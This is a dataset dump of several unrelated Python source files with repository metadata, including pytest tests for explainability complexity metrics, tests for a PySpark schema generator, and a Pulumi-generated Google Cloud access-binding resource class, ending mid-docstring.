] | null | null | null | catulator_app/webapp.py | LilacRapture/catulator_bot | a701aa657236f19e124121bc160d6e39b0ba9321 | [
"MIT"
] | null | null | null | from . import app
from . import routes
| 13 | 20 | 0.74359 | 6 | 39 | 4.833333 | 0.666667 | 0.689655 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.205128 | 39 | 2 | 21 | 19.5 | 0.935484 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
4a2145b06c10a85214d0ac16b32ea169da729813 | 138 | py | Python | module2/__init__.py | axel-sirota/advanced-generator-and-coroutines | fbb4f869b030a05dc10b4a49e9a091068d11e194 | [
"MIT"
] | 5 | 2020-08-04T16:44:14.000Z | 2021-08-21T02:23:03.000Z | module2/__init__.py | axel-sirota/advanced-generator-and-coroutines | fbb4f869b030a05dc10b4a49e9a091068d11e194 | [
"MIT"
] | 1 | 2021-03-21T16:33:58.000Z | 2021-03-21T16:33:58.000Z | module2/__init__.py | axel-sirota/advanced-generator-and-coroutines | fbb4f869b030a05dc10b4a49e9a091068d11e194 | [
"MIT"
] | 4 | 2020-10-22T11:40:15.000Z | 2022-01-30T19:42:07.000Z | from .mybomb import MyBomb
from .mybombgenerator import mybomb
from .mybomblazy import MyNotLazyBomb, mylazygenerator
from .demo import *
| 27.6 | 54 | 0.833333 | 16 | 138 | 7.1875 | 0.5 | 0.208696 | 0.278261 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.123188 | 138 | 4 | 55 | 34.5 | 0.950413 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
c58b7263ea78bebba9c7c1cd06a3cce85120c5cc | 10,784 | py | Python | tests/metrics/test_complexity_metrics.py | sebastian-lapuschkin/Quantus | c3b8a9fb2018f34bd89ba38efa2b2b8c38128b3f | [
"MIT"
] | null | null | null | tests/metrics/test_complexity_metrics.py | sebastian-lapuschkin/Quantus | c3b8a9fb2018f34bd89ba38efa2b2b8c38128b3f | [
"MIT"
] | null | null | null | tests/metrics/test_complexity_metrics.py | sebastian-lapuschkin/Quantus | c3b8a9fb2018f34bd89ba38efa2b2b8c38128b3f | [
"MIT"
] | null | null | null | from typing import Union
import numpy as np
import pytest
from pytest_lazyfixture import lazy_fixture
from ..fixtures import *
from ...quantus.metrics import *
from ...quantus.helpers import *
from ...quantus.helpers.explanation_func import explain
@pytest.mark.complexity
@pytest.mark.parametrize(
"model,data,params,expected",
[
(
None,
lazy_fixture("almost_uniform_1d"),
{
"normalise": False,
"disable_warnings": False,
"display_progressbar": False,
},
{"max": 1.0, "min": 0.0},
),
(
None,
lazy_fixture("almost_uniform_2d"),
{
"normalise": False,
"disable_warnings": False,
"display_progressbar": False,
},
{"max": 1.0, "min": 0.0},
),
(
None,
lazy_fixture("almost_uniform_1d"),
{
"normalise": True,
"disable_warnings": True,
"display_progressbar": False,
},
{"max": 1.0, "min": 0.0},
),
(
None,
lazy_fixture("almost_uniform_2d"),
{
"normalise": True,
"disable_warnings": True,
"display_progressbar": False,
},
{"max": 1.0, "min": 0.0},
),
(
lazy_fixture("load_1d_3ch_conv_model"),
lazy_fixture("almost_uniform_1d_no_abatch"),
{
"normalise": False,
"explain_func": explain,
"disable_warnings": True,
"display_progressbar": False,
},
{"max": 1.0, "min": 0.0},
),
(
lazy_fixture("load_mnist_model"),
lazy_fixture("almost_uniform_2d_no_abatch"),
{
"normalise": False,
"explain_func": explain,
"disable_warnings": True,
"display_progressbar": False,
},
{"max": 1.0, "min": 0.0},
),
(
None,
lazy_fixture("almost_uniform_1d"),
{
"normalise": False,
"abs": False,
"disable_warnings": True,
"display_progressbar": False,
},
{"max": 1.0, "min": 0.0},
),
(
None,
lazy_fixture("almost_uniform_2d"),
{
"normalise": False,
"abs": False,
"disable_warnings": True,
"display_progressbar": False,
},
{"max": 1.0, "min": 0.0},
),
(
None,
lazy_fixture("almost_uniform_1d"),
{
"normalise": False,
"disable_warnings": True,
"display_progressbar": True,
},
{"max": 1.0, "min": 0.0},
),
(
None,
lazy_fixture("almost_uniform_2d"),
{
"normalise": False,
"disable_warnings": True,
"display_progressbar": True,
},
{"max": 1.0, "min": 0.0},
),
],
)
def test_sparseness(
model: ModelInterface,
data: dict,
params: dict,
expected: Union[float, dict, bool],
):
scores = Sparseness(**params)(
model=model,
x_batch=data["x_batch"],
y_batch=data["y_batch"],
a_batch=data["a_batch"],
**params
)
if isinstance(expected, float):
assert all(s == expected for s in scores), "Test failed."
else:
assert all(
((s > expected["min"]) & (s < expected["max"])) for s in scores
), "Test failed."
@pytest.mark.complexity
@pytest.mark.parametrize(
"model,data,params,expected",
[
(
None,
lazy_fixture("almost_uniform_1d"),
{
"normalise": False,
"disable_warnings": False,
"display_progressbar": False,
},
{"max": 1.0, "min": 0.0},
),
(
None,
lazy_fixture("almost_uniform_2d"),
{
"normalise": False,
"disable_warnings": False,
"display_progressbar": False,
},
{"max": 1.0, "min": 0.0},
),
(
None,
lazy_fixture("almost_uniform_1d"),
{
"normalise": True,
"disable_warnings": True,
"display_progressbar": False,
},
{"max": 1.0, "min": 0.0},
),
(
None,
lazy_fixture("almost_uniform_2d"),
{
"normalise": True,
"disable_warnings": True,
"display_progressbar": False,
},
{"max": 1.0, "min": 0.0},
),
(
None,
lazy_fixture("almost_uniform_1d"),
{
"normalise": False,
"abs": False,
"disable_warnings": True,
"display_progressbar": False,
},
{"max": 1.0, "min": 0.0},
),
(
None,
lazy_fixture("almost_uniform_2d"),
{
"normalise": False,
"abs": False,
"disable_warnings": True,
"display_progressbar": False,
},
{"max": 1.0, "min": 0.0},
),
(
lazy_fixture("load_1d_3ch_conv_model"),
lazy_fixture("almost_uniform_1d_no_abatch"),
{
"normalise": False,
"explain_func": explain,
"disable_warnings": True,
"display_progressbar": False,
},
{"max": 1.0, "min": 0.0},
),
(
lazy_fixture("load_mnist_model"),
lazy_fixture("almost_uniform_2d_no_abatch"),
{
"normalise": False,
"explain_func": explain,
"disable_warnings": True,
"display_progressbar": False,
},
{"max": 1.0, "min": 0.0},
),
(
None,
lazy_fixture("almost_uniform_1d"),
{
"normalise": False,
"disable_warnings": True,
"display_progressbar": True,
},
{"max": 1.0, "min": 0.0},
),
(
None,
lazy_fixture("almost_uniform_2d"),
{
"normalise": False,
"disable_warnings": True,
"display_progressbar": True,
},
{"max": 1.0, "min": 0.0},
),
],
)
def test_complexity(
model: ModelInterface,
data: dict,
params: dict,
expected: Union[float, dict, bool],
):
scores = Complexity(**params)(
model=model,
x_batch=data["x_batch"],
y_batch=data["y_batch"],
a_batch=data["a_batch"],
**params
)
assert scores is not None, "Test failed."
@pytest.mark.complexity
@pytest.mark.parametrize(
"model,data,params,expected",
[
(
None,
lazy_fixture("almost_uniform_1d"),
{
"normalise": True,
"disable_warnings": False,
"display_progressbar": False,
},
{"max": 1.0, "min": 0.0},
),
(
None,
lazy_fixture("almost_uniform_2d"),
{
"normalise": True,
"disable_warnings": False,
"display_progressbar": False,
},
{"max": 1.0, "min": 0.0},
),
(
None,
lazy_fixture("almost_uniform_1d"),
{
"normalise": False,
"disable_warnings": True,
"display_progressbar": False,
},
{"max": 1.0, "min": 0.0},
),
(
None,
lazy_fixture("almost_uniform_2d"),
{
"normalise": False,
"disable_warnings": True,
"display_progressbar": False,
},
{"max": 1.0, "min": 0.0},
),
(
None,
lazy_fixture("almost_uniform_1d"),
{
"normalise": False,
"abs": False,
"disable_warnings": True,
"display_progressbar": False,
},
{"max": 1.0, "min": 0.0},
),
(
None,
lazy_fixture("almost_uniform_2d"),
{
"normalise": False,
"abs": False,
"disable_warnings": True,
"display_progressbar": False,
},
{"max": 1.0, "min": 0.0},
),
(
lazy_fixture("load_1d_3ch_conv_model"),
lazy_fixture("almost_uniform_1d_no_abatch"),
{
"normalise": False,
"disable_warnings": True,
"display_progressbar": False,
"explain_func": explain,
},
{"max": 1.0, "min": 0.0},
),
(
lazy_fixture("load_mnist_model"),
lazy_fixture("almost_uniform_2d_no_abatch"),
{
"normalise": False,
"disable_warnings": True,
"display_progressbar": False,
"explain_func": explain,
},
{"max": 1.0, "min": 0.0},
),
(
None,
lazy_fixture("almost_uniform_1d"),
{
"normalise": False,
"disable_warnings": True,
"display_progressbar": True,
},
{"max": 1.0, "min": 0.0},
),
(
None,
lazy_fixture("almost_uniform_2d"),
{
"normalise": False,
"disable_warnings": True,
"display_progressbar": True,
},
{"max": 1.0, "min": 0.0},
),
],
)
def test_effective_complexity(
model: ModelInterface,
data: dict,
params: dict,
expected: Union[float, dict, bool],
):
scores = EffectiveComplexity(**params)(
model=model,
x_batch=data["x_batch"],
y_batch=data["y_batch"],
a_batch=data["a_batch"],
**params
)
assert scores is not None, "Test failed."
| 27.370558 | 75 | 0.419603 | 885 | 10,784 | 4.867797 | 0.082486 | 0.094475 | 0.118384 | 0.167131 | 0.922006 | 0.922006 | 0.914113 | 0.914113 | 0.914113 | 0.914113 | 0 | 0.026342 | 0.450853 | 10,784 | 393 | 76 | 27.440204 | 0.701114 | 0 | 0 | 0.690909 | 0 | 0 | 0.22895 | 0.028375 | 0 | 0 | 0 | 0 | 0.01039 | 1 | 0.007792 | false | 0 | 0.020779 | 0 | 0.028571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c5e31d1fa51b2136f55500dc3adf07c71b6ac004 | 6,630 | py | Python | src/datalakebundle/table/schema/tests/TableSchemaGenerator_test.py | bricksflow/datalake-bundle | 2d435a46a74915a23738482a71f240a89ab32389 | [
"MIT"
] | null | null | null | src/datalakebundle/table/schema/tests/TableSchemaGenerator_test.py | bricksflow/datalake-bundle | 2d435a46a74915a23738482a71f240a89ab32389 | [
"MIT"
] | 1 | 2021-11-04T13:01:15.000Z | 2021-11-04T13:01:15.000Z | src/datalakebundle/table/schema/TableSchemaGenerator_test.py | daipe-ai/datalake-bundle | 01bd0e2e7361561f2278fe08ee78b92beb9cda26 | [
"MIT"
] | null | null | null | import pyspark.sql.types as t
from datalakebundle.table.schema.TableSchemaGenerator import TableSchemaGenerator
schema = t.StructType(
[
t.StructField("FIELD1", t.IntegerType()),
t.StructField("FIELD2", t.DoubleType()),
t.StructField("FIELD3", t.DoubleType()),
t.StructField(
"STRUCT1",
t.StructType(
[
t.StructField("NESTED_FIELD1", t.StringType()),
t.StructField(
"STRUCT2",
t.StructType(
[
t.StructField("NESTED_FIELD2", t.StringType()),
],
),
),
],
),
),
],
)
expected_result = """def get_schema():
return TableSchema(
[
t.StructField("FIELD1", t.IntegerType()),
t.StructField("FIELD2", t.DoubleType()),
t.StructField("FIELD3", t.DoubleType()),
t.StructField(
"STRUCT1",
t.StructType(
[
t.StructField("NESTED_FIELD1", t.StringType()),
t.StructField(
"STRUCT2",
t.StructType(
[
t.StructField("NESTED_FIELD2", t.StringType()),
],
),
),
],
),
),
],
# primary_key="", # INSERT PRIMARY KEY(s) HERE (OPTIONAL)
# partition_by="" # INSERT PARTITION KEY(s) HERE (OPTIONAL)
# tbl_properties={} # INSERT TBLPROPERTIES HERE (OPTIONAL)
)
"""
assert TableSchemaGenerator().generate(schema) == expected_result
schema = t.StructType(
[
t.StructField("FIELD1", t.IntegerType()),
t.StructField("FIELD2", t.DoubleType()),
t.StructField("FIELD3", t.DoubleType()),
t.StructField(
"ARRAY1",
t.ArrayType(
t.StructType(
[
t.StructField("NESTED_ARRAY_FIELD1", t.StringType()),
t.StructField("NESTED_ARRAY_FIELD2", t.StringType()),
t.StructField("NESTED_ARRAY_FIELD3", t.ArrayType(t.StringType())),
],
),
),
),
],
)
expected_result = """def get_schema():
return TableSchema(
[
t.StructField("FIELD1", t.IntegerType()),
t.StructField("FIELD2", t.DoubleType()),
t.StructField("FIELD3", t.DoubleType()),
t.StructField(
"ARRAY1",
t.ArrayType(
t.StructType(
[
t.StructField("NESTED_ARRAY_FIELD1", t.StringType()),
t.StructField("NESTED_ARRAY_FIELD2", t.StringType()),
t.StructField("NESTED_ARRAY_FIELD3", t.ArrayType(t.StringType())),
],
),
),
),
],
# primary_key="", # INSERT PRIMARY KEY(s) HERE (OPTIONAL)
# partition_by="" # INSERT PARTITION KEY(s) HERE (OPTIONAL)
# tbl_properties={} # INSERT TBLPROPERTIES HERE (OPTIONAL)
)
"""
assert TableSchemaGenerator().generate(schema) == expected_result
schema = t.StructType(
[
t.StructField("FIELD1", t.IntegerType()),
t.StructField("FIELD2", t.DoubleType()),
t.StructField("FIELD3", t.DoubleType()),
t.StructField(
"ARRAY1",
t.ArrayType(
t.ArrayType(t.StringType()),
),
),
],
)
expected_result = """def get_schema():
return TableSchema(
[
t.StructField("FIELD1", t.IntegerType()),
t.StructField("FIELD2", t.DoubleType()),
t.StructField("FIELD3", t.DoubleType()),
t.StructField(
"ARRAY1",
t.ArrayType(
t.ArrayType(t.StringType()),
),
),
],
# primary_key="", # INSERT PRIMARY KEY(s) HERE (OPTIONAL)
# partition_by="" # INSERT PARTITION KEY(s) HERE (OPTIONAL)
# tbl_properties={} # INSERT TBLPROPERTIES HERE (OPTIONAL)
)
"""
assert TableSchemaGenerator().generate(schema) == expected_result
schema = t.StructType(
[
t.StructField("FIELD1", t.IntegerType()),
t.StructField("FIELD2", t.DoubleType()),
t.StructField("FIELD3", t.DoubleType()),
t.StructField(
"ARRAY1",
t.ArrayType(
t.ArrayType(
t.StructType(
[
t.StructField(
"VERY_BADLY_NESTED_ARRAY_OF_ARRAY_OF_ARRAY_OF_DOUBLES",
t.ArrayType(
t.ArrayType(
t.ArrayType(t.DoubleType()),
),
),
),
],
),
),
),
),
],
)
expected_result = """def get_schema():
return TableSchema(
[
t.StructField("FIELD1", t.IntegerType()),
t.StructField("FIELD2", t.DoubleType()),
t.StructField("FIELD3", t.DoubleType()),
t.StructField(
"ARRAY1",
t.ArrayType(
t.ArrayType(
t.StructType(
[
t.StructField(
"VERY_BADLY_NESTED_ARRAY_OF_ARRAY_OF_ARRAY_OF_DOUBLES",
t.ArrayType(
t.ArrayType(
t.ArrayType(t.DoubleType()),
),
),
),
],
),
),
),
),
],
# primary_key="", # INSERT PRIMARY KEY(s) HERE (OPTIONAL)
# partition_by="" # INSERT PARTITION KEY(s) HERE (OPTIONAL)
# tbl_properties={} # INSERT TBLPROPERTIES HERE (OPTIONAL)
)
"""
assert TableSchemaGenerator().generate(schema) == expected_result
| 32.985075 | 94 | 0.422775 | 465 | 6,630 | 5.903226 | 0.103226 | 0.201093 | 0.072131 | 0.134062 | 0.963934 | 0.963934 | 0.963934 | 0.963934 | 0.963934 | 0.963934 | 0 | 0.012256 | 0.458522 | 6,630 | 200 | 95 | 33.15 | 0.752368 | 0 | 0 | 0.861702 | 0 | 0 | 0.588839 | 0.095928 | 0 | 0 | 0 | 0 | 0.021277 | 1 | 0 | false | 0 | 0.010638 | 0 | 0.031915 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
a8c272168120ddc95c10dfbbc52c6dc22fca1d34 | 229 | py | Python | tests/structure_prediction/__init__.py | jharrymoore/Icolos | c60cc00c34208ab7011d41d52a74651763673e7a | [
"Apache-2.0"
] | 11 | 2022-01-30T14:36:13.000Z | 2022-03-22T09:40:57.000Z | tests/structure_prediction/__init__.py | jharrymoore/Icolos | c60cc00c34208ab7011d41d52a74651763673e7a | [
"Apache-2.0"
] | 2 | 2022-03-23T07:56:49.000Z | 2022-03-24T12:01:42.000Z | tests/structure_prediction/__init__.py | jharrymoore/Icolos | c60cc00c34208ab7011d41d52a74651763673e7a | [
"Apache-2.0"
] | 8 | 2022-01-28T10:32:31.000Z | 2022-03-22T09:40:59.000Z | from tests.structure_prediction.test_peptide_embedder import *
from tests.structure_prediction.test_pdb_fixer import *
# from tests.structure_prediction.test_dssp import *
# TODO: work out why the dssp unit test hangs sometimes
| 38.166667 | 62 | 0.838428 | 33 | 229 | 5.575758 | 0.575758 | 0.146739 | 0.293478 | 0.456522 | 0.586957 | 0.413043 | 0 | 0 | 0 | 0 | 0 | 0 | 0.10917 | 229 | 5 | 63 | 45.8 | 0.901961 | 0.454148 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.2 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
767da7e298d7abe02446afacae01784464915b4f | 16,542 | py | Python | sdk/python/pulumi_gcp/accesscontextmanager/gcp_user_access_binding.py | sisisin/pulumi-gcp | af6681d70ea457843409110c1324817fe55f68ad | [
"ECL-2.0",
"Apache-2.0"
] | 121 | 2018-06-18T19:16:42.000Z | 2022-03-31T06:06:48.000Z | sdk/python/pulumi_gcp/accesscontextmanager/gcp_user_access_binding.py | sisisin/pulumi-gcp | af6681d70ea457843409110c1324817fe55f68ad | [
"ECL-2.0",
"Apache-2.0"
] | 492 | 2018-06-22T19:41:03.000Z | 2022-03-31T15:33:53.000Z | sdk/python/pulumi_gcp/accesscontextmanager/gcp_user_access_binding.py | sisisin/pulumi-gcp | af6681d70ea457843409110c1324817fe55f68ad | [
"ECL-2.0",
"Apache-2.0"
] | 43 | 2018-06-19T01:43:13.000Z | 2022-03-23T22:43:37.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['GcpUserAccessBindingArgs', 'GcpUserAccessBinding']
@pulumi.input_type
class GcpUserAccessBindingArgs:
def __init__(__self__, *,
access_levels: pulumi.Input[str],
group_key: pulumi.Input[str],
organization_id: pulumi.Input[str]):
"""
The set of arguments for constructing a GcpUserAccessBinding resource.
:param pulumi.Input[str] access_levels: Required. Access level that a user must have to be granted access. Only one access level is supported, not multiple. This repeated field must have exactly one element. Example: "accessPolicies/9522/accessLevels/device_trusted"
:param pulumi.Input[str] group_key: Required. Immutable. Google Group id whose members are subject to this binding's restrictions. See "id" in the G Suite Directory API's Groups resource. If a group's email address/alias is changed, this resource will continue to point at the changed group. This field does not accept group email addresses or aliases. Example: "01d520gv4vjcrht"
:param pulumi.Input[str] organization_id: Required. ID of the parent organization.
"""
pulumi.set(__self__, "access_levels", access_levels)
pulumi.set(__self__, "group_key", group_key)
pulumi.set(__self__, "organization_id", organization_id)
@property
@pulumi.getter(name="accessLevels")
def access_levels(self) -> pulumi.Input[str]:
"""
Required. Access level that a user must have to be granted access. Only one access level is supported, not multiple. This repeated field must have exactly one element. Example: "accessPolicies/9522/accessLevels/device_trusted"
"""
return pulumi.get(self, "access_levels")
@access_levels.setter
def access_levels(self, value: pulumi.Input[str]):
pulumi.set(self, "access_levels", value)
@property
@pulumi.getter(name="groupKey")
def group_key(self) -> pulumi.Input[str]:
"""
Required. Immutable. Google Group id whose members are subject to this binding's restrictions. See "id" in the G Suite Directory API's Groups resource. If a group's email address/alias is changed, this resource will continue to point at the changed group. This field does not accept group email addresses or aliases. Example: "01d520gv4vjcrht"
"""
return pulumi.get(self, "group_key")
@group_key.setter
def group_key(self, value: pulumi.Input[str]):
pulumi.set(self, "group_key", value)
@property
@pulumi.getter(name="organizationId")
def organization_id(self) -> pulumi.Input[str]:
"""
Required. ID of the parent organization.
"""
return pulumi.get(self, "organization_id")
@organization_id.setter
def organization_id(self, value: pulumi.Input[str]):
pulumi.set(self, "organization_id", value)
@pulumi.input_type
class _GcpUserAccessBindingState:
def __init__(__self__, *,
access_levels: Optional[pulumi.Input[str]] = None,
group_key: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
organization_id: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering GcpUserAccessBinding resources.
:param pulumi.Input[str] access_levels: Required. Access level that a user must have to be granted access. Only one access level is supported, not multiple. This repeated field must have exactly one element. Example: "accessPolicies/9522/accessLevels/device_trusted"
:param pulumi.Input[str] group_key: Required. Immutable. Google Group id whose members are subject to this binding's restrictions. See "id" in the G Suite Directory API's Groups resource. If a group's email address/alias is changed, this resource will continue to point at the changed group. This field does not accept group email addresses or aliases. Example: "01d520gv4vjcrht"
:param pulumi.Input[str] name: Immutable. Assigned by the server during creation. The last segment has an arbitrary length and has only URI unreserved
characters (as defined by RFC 3986 Section 2.3). Should not be specified by the client during creation. Example:
"organizations/256/gcpUserAccessBindings/b3-BhcX_Ud5N"
:param pulumi.Input[str] organization_id: Required. ID of the parent organization.
"""
if access_levels is not None:
pulumi.set(__self__, "access_levels", access_levels)
if group_key is not None:
pulumi.set(__self__, "group_key", group_key)
if name is not None:
pulumi.set(__self__, "name", name)
if organization_id is not None:
pulumi.set(__self__, "organization_id", organization_id)
@property
@pulumi.getter(name="accessLevels")
def access_levels(self) -> Optional[pulumi.Input[str]]:
"""
Required. Access level that a user must have to be granted access. Only one access level is supported, not multiple. This repeated field must have exactly one element. Example: "accessPolicies/9522/accessLevels/device_trusted"
"""
return pulumi.get(self, "access_levels")
@access_levels.setter
def access_levels(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "access_levels", value)
@property
@pulumi.getter(name="groupKey")
def group_key(self) -> Optional[pulumi.Input[str]]:
"""
Required. Immutable. Google Group id whose members are subject to this binding's restrictions. See "id" in the G Suite Directory API's Groups resource. If a group's email address/alias is changed, this resource will continue to point at the changed group. This field does not accept group email addresses or aliases. Example: "01d520gv4vjcrht"
"""
return pulumi.get(self, "group_key")
@group_key.setter
def group_key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "group_key", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Immutable. Assigned by the server during creation. The last segment has an arbitrary length and has only URI unreserved
characters (as defined by RFC 3986 Section 2.3). Should not be specified by the client during creation. Example:
"organizations/256/gcpUserAccessBindings/b3-BhcX_Ud5N"
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="organizationId")
def organization_id(self) -> Optional[pulumi.Input[str]]:
"""
Required. ID of the parent organization.
"""
return pulumi.get(self, "organization_id")
@organization_id.setter
def organization_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "organization_id", value)
class GcpUserAccessBinding(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
access_levels: Optional[pulumi.Input[str]] = None,
group_key: Optional[pulumi.Input[str]] = None,
organization_id: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Restricts access to Cloud Console and Google Cloud APIs for a set of users using Context-Aware Access.
To get more information about GcpUserAccessBinding, see:
* [API documentation](https://cloud.google.com/access-context-manager/docs/reference/rest/v1/organizations.gcpUserAccessBindings)
## Example Usage
## Import
GcpUserAccessBinding can be imported using any of these accepted formats
```sh
$ pulumi import gcp:accesscontextmanager/gcpUserAccessBinding:GcpUserAccessBinding default {{name}}
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] access_levels: Required. Access level that a user must have to be granted access. Only one access level is supported, not multiple. This repeated field must have exactly one element. Example: "accessPolicies/9522/accessLevels/device_trusted"
:param pulumi.Input[str] group_key: Required. Immutable. Google Group id whose members are subject to this binding's restrictions. See "id" in the G Suite Directory API's Groups resource. If a group's email address/alias is changed, this resource will continue to point at the changed group. This field does not accept group email addresses or aliases. Example: "01d520gv4vjcrht"
:param pulumi.Input[str] organization_id: Required. ID of the parent organization.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: GcpUserAccessBindingArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Restricts access to Cloud Console and Google Cloud APIs for a set of users using Context-Aware Access.
To get more information about GcpUserAccessBinding, see:
* [API documentation](https://cloud.google.com/access-context-manager/docs/reference/rest/v1/organizations.gcpUserAccessBindings)
## Example Usage
## Import
GcpUserAccessBinding can be imported using any of these accepted formats
```sh
$ pulumi import gcp:accesscontextmanager/gcpUserAccessBinding:GcpUserAccessBinding default {{name}}
```
:param str resource_name: The name of the resource.
:param GcpUserAccessBindingArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(GcpUserAccessBindingArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
access_levels: Optional[pulumi.Input[str]] = None,
group_key: Optional[pulumi.Input[str]] = None,
organization_id: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = GcpUserAccessBindingArgs.__new__(GcpUserAccessBindingArgs)
if access_levels is None and not opts.urn:
raise TypeError("Missing required property 'access_levels'")
__props__.__dict__["access_levels"] = access_levels
if group_key is None and not opts.urn:
raise TypeError("Missing required property 'group_key'")
__props__.__dict__["group_key"] = group_key
if organization_id is None and not opts.urn:
raise TypeError("Missing required property 'organization_id'")
__props__.__dict__["organization_id"] = organization_id
__props__.__dict__["name"] = None
super(GcpUserAccessBinding, __self__).__init__(
'gcp:accesscontextmanager/gcpUserAccessBinding:GcpUserAccessBinding',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
access_levels: Optional[pulumi.Input[str]] = None,
group_key: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
organization_id: Optional[pulumi.Input[str]] = None) -> 'GcpUserAccessBinding':
"""
Get an existing GcpUserAccessBinding resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] access_levels: Required. Access level that a user must have to be granted access. Only one access level is supported, not multiple. This repeated field must have exactly one element. Example: "accessPolicies/9522/accessLevels/device_trusted"
:param pulumi.Input[str] group_key: Required. Immutable. Google Group id whose members are subject to this binding's restrictions. See "id" in the G Suite Directory API's Groups resource. If a group's email address/alias is changed, this resource will continue to point at the changed group. This field does not accept group email addresses or aliases. Example: "01d520gv4vjcrht"
:param pulumi.Input[str] name: Immutable. Assigned by the server during creation. The last segment has an arbitrary length and has only URI unreserved
characters (as defined by RFC 3986 Section 2.3). Should not be specified by the client during creation. Example:
"organizations/256/gcpUserAccessBindings/b3-BhcX_Ud5N"
:param pulumi.Input[str] organization_id: Required. ID of the parent organization.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _GcpUserAccessBindingState.__new__(_GcpUserAccessBindingState)
__props__.__dict__["access_levels"] = access_levels
__props__.__dict__["group_key"] = group_key
__props__.__dict__["name"] = name
__props__.__dict__["organization_id"] = organization_id
return GcpUserAccessBinding(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="accessLevels")
def access_levels(self) -> pulumi.Output[str]:
"""
Required. Access level that a user must have to be granted access. Only one access level is supported, not multiple. This repeated field must have exactly one element. Example: "accessPolicies/9522/accessLevels/device_trusted"
"""
return pulumi.get(self, "access_levels")
@property
@pulumi.getter(name="groupKey")
def group_key(self) -> pulumi.Output[str]:
"""
Required. Immutable. Google Group id whose members are subject to this binding's restrictions. See "id" in the G Suite Directory API's Groups resource. If a group's email address/alias is changed, this resource will continue to point at the changed group. This field does not accept group email addresses or aliases. Example: "01d520gv4vjcrht"
"""
return pulumi.get(self, "group_key")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
